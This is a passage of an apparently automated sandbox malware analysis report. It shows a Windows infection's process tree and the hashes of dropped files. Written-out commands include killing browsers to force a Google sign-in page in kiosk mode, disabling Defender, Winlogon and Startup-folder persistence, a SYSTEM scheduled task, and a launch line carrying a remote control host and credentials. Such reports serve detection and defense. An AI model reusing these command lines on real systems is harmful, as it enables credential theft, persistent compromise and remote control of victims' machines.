                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3924
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3932
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1588 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:2
                                        8⤵
                                          PID:3644
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3868 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:8
                                          8⤵
                                            PID:3480
                                      • C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:1588
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM firefox.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:764
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM chrome.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1936
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM msedge.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2172
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM opera.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1224
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM brave.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2692
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                          7⤵
                                            PID:884
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                              8⤵
                                              • Checks processor information in registry
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:2612
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.0.753336387\1122620246" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1036 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af1f3b47-b849-487e-b95a-9c1e79b1e933} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1340 106d2c58 gpu
                                                9⤵
                                                  PID:1896
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.1.623318347\1691582342" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2de0aa3-f026-4bfb-8040-d9adcf8d925f} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1548 ebec258 socket
                                                  9⤵
                                                    PID:916
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.2.649027204\61099573" -childID 1 -isForBrowser -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37d418fd-48cd-4c0c-ba81-2766ff08aee8} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2152 19284d58 tab
                                                    9⤵
                                                      PID:608
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.3.606707241\1272150827" -childID 2 -isForBrowser -prefsHandle 2788 -prefMapHandle 2784 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {789a7375-3374-4511-8222-6d1794f02f09} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2800 1d979458 tab
                                                      9⤵
                                                        PID:2924
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.4.978799730\1515863994" -childID 3 -isForBrowser -prefsHandle 3756 -prefMapHandle 3752 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddbd43ab-e94a-4ae1-be66-20bea81e809a} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3768 1ec36b58 tab
                                                        9⤵
                                                          PID:972
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.5.523113482\761905324" -childID 4 -isForBrowser -prefsHandle 3888 -prefMapHandle 3892 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5aebc424-cb07-4530-80d0-e3db7a15f950} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3880 1f7d6158 tab
                                                          9⤵
                                                            PID:1700
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.6.1550244862\1813624862" -childID 5 -isForBrowser -prefsHandle 4044 -prefMapHandle 4048 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {816de81a-fbbe-452f-bd13-7c079d12d41d} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 4036 1fa22858 tab
                                                            9⤵
                                                              PID:3052
                                                      • C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe"
                                                        6⤵
                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        • Modifies Windows Defender TamperProtection settings
                                                        • Modifies Windows Defender notification settings
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Windows security modification
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3360
                                                      • C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies system certificate store
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3328
                                                      • C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4784
                                                        • C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4824
                                                          • C:\Users\Admin\AppData\Roaming\4p0OMTuhea.exe
                                                            "C:\Users\Admin\AppData\Roaming\4p0OMTuhea.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4948
                                                          • C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe
                                                            "C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            • Drops file in Windows directory
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4976
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiwjvcdgoS.bat"
                                                              9⤵
                                                                PID:3876
                                                                • C:\Windows\system32\chcp.com
                                                                  chcp 65001
                                                                  10⤵
                                                                    PID:4120
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping -n 10 localhost
                                                                    10⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:4128
                                                                  • C:\Windows\DigitalLocker\it-IT\firefox.exe
                                                                    "C:\Windows\DigitalLocker\it-IT\firefox.exe"
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4528
                                                          • C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4368
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1204
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Program crash
                                                              PID:4692
                                                          • C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3792
                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                              7⤵
                                                              • Downloads MZ/PE file
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4924
                                                          • C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3828
                                                          • C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3620
                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4392
                                                          • C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5068
                                                            • C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5108
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 1016
                                                                8⤵
                                                                • Program crash
                                                                PID:4220
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 500
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Program crash
                                                              PID:1108
                                                          • C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4284
                                                            • C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4324
                                                            • C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2784
                                                              • C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe
                                                                "C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:320
                                                              • C:\Users\Admin\AppData\Roaming\T9wBxU6hjy.exe
                                                                "C:\Users\Admin\AppData\Roaming\T9wBxU6hjy.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1608
                                                          • C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies system certificate store
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4100
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe,"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:3328
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 7
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:4876
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe,"
                                                                8⤵
                                                                • Modifies WinLogon for persistence
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3268
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe"
                                                              7⤵
                                                              • Drops startup file
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:4092
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 10
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:3560
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 10
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:3412
                                                          • C:\Users\Admin\AppData\Local\Temp\10168160101\0uzaP1a.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168160101\0uzaP1a.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4936
                                                            • C:\Windows\System32\wscript.exe
                                                              "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"
                                                              7⤵
                                                              • Blocklisted process makes network request
                                                              • Downloads MZ/PE file
                                                              PID:3900
                                                              • C:\Windows\System32\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\B892A5C1B94D29B5C3A8FFF4A984794E\64B9C9B9CAF42AE04FA90DF285FF96F6.vbe" /f /rl highest
                                                                8⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4728
                                                              • C:\Windows\System32\taskkill.exe
                                                                "C:\Windows\System32\taskkill.exe" /f /pid 1092 /t
                                                                8⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4764
                                                              • C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
                                                                "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:1548
                                                          • C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3944
                                                            • C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3572
                                                          • C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4044
                                                            • C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4944
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1028
                                                                8⤵
                                                                • Program crash
                                                                PID:3700
                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                  1⤵
                                                    PID:824
                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                    1⤵
                                                      PID:3916

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Downloads

                                                    • C:\ProgramData\AKEBFCFIJJKKECAKJEHD
                                                      Filesize: 6KB
                                                      MD5: 26115ef17a1dd41762013ed0b05dd952
                                                      SHA1: 065dc32129f996b307d0a6a8e83d038c592c82cc
                                                      SHA256: 777561a61fa579057686fbc1fa0d054da7900adb26abf635ed7b38e33cade4a5
                                                      SHA512: 78e7b1959ec18766cba78b152f6ab644a169982aace0196ed859748e00e2f70a72f702373a01b780b5b674ce7657fc35983d84d3af48ed2911c338cb43bce491

                                                    • C:\Temp\NUnXI0p8x.hta
                                                      Filesize: 779B
                                                      MD5: 39c8cd50176057af3728802964f92d49
                                                      SHA1: 68fc10a10997d7ad00142fc0de393fe3500c8017
                                                      SHA256: f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
                                                      SHA512: cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                      Filesize: 71KB
                                                      MD5: 83142242e97b8953c386f988aa694e4a
                                                      SHA1: 833ed12fc15b356136dcdd27c61a50f59c5c7d50
                                                      SHA256: d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
                                                      SHA512: bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                      Filesize: 344B
                                                      MD5: 0c1ace0cb49915a3f77b4d704397c55c
                                                      SHA1: 5d4d10f5a0dbe06838ceb136af7ef262425cc298
                                                      SHA256: 62e3fb487c78175ee6227d63b3c7790abf8f70d27595707265d1c4d797792cbd
                                                      SHA512: 35b61c24617d1d58a8be65c194ce4b24638b227128b73cf4dd18005fab2b1126f4c3e60820b6f3e560dfb1c0f79ef808ea4a5b78ec8dbbe0fa817e961d0f0932

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp
                                                      Filesize: 16B
                                                      MD5: 18e723571b00fb1694a3bad6c78e4054
                                                      SHA1: afcc0ef32d46fe59e0483f9a3c891d3034d12f32
                                                      SHA256: 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
                                                      SHA512: 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
                                                      Filesize: 16B
                                                      MD5: aefd77f47fb84fae5ea194496b44c67a
                                                      SHA1: dcfbb6a5b8d05662c4858664f81693bb7f803b82
                                                      SHA256: 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
                                                      SHA512: b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Code Cache\js\index-dir\temp-index
                                                      Filesize: 48B
                                                      MD5: 677696a27287d0e34087335e34bb1fd1
                                                      SHA1: ef0e7b4f920815a7e677df2c6ab44c67d05e2e39
                                                      SHA256: 5abd0717b8f0a06c266a423ba28eab1c72a965c2b8d4d469aee026fe7d5a2837
                                                      SHA512: ec09d6c236502119ec72d6557ccd7f579fcc136a7233c4fe8d7541d504180351c074ea7dfaf6d9a081e000ba14eec508abfa0c2719b82401a607d20576524aa7

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\CURRENT
                                                      Filesize: 16B
                                                      MD5: 46295cac801e5d4857d09837238a6394
                                                      SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
                                                      SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
                                                      SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
                                                      Filesize: 264KB
                                                      MD5: f50f89a0a91564d0b8a211f8921aa7de
                                                      SHA1: 112403a17dd69d5b9018b8cede023cb3b54eab7d
                                                      SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
                                                      SHA512: bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\000004.dbtmp
                                                      Filesize: 16B
                                                      MD5: 6752a1d65b201c13b62ea44016eb221f
                                                      SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
                                                      SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
                                                      SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\MANIFEST-000001
                                                      Filesize: 41B
                                                      MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
                                                      SHA1: d5b5bbf396dc291274584ef71f444f420b6056f1
                                                      SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
                                                      SHA512: de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\000002.dbtmp
                                                      Filesize: 16B
                                                      MD5: 206702161f94c5cd39fadd03f4014d98
                                                      SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
                                                      SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
                                                      SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LW44N8OS\service[1].htm
                                                      Filesize: 1B
                                                      MD5: cfcd208495d565ef66e7dff9f98764da
                                                      SHA1: b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
                                                      SHA256: 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
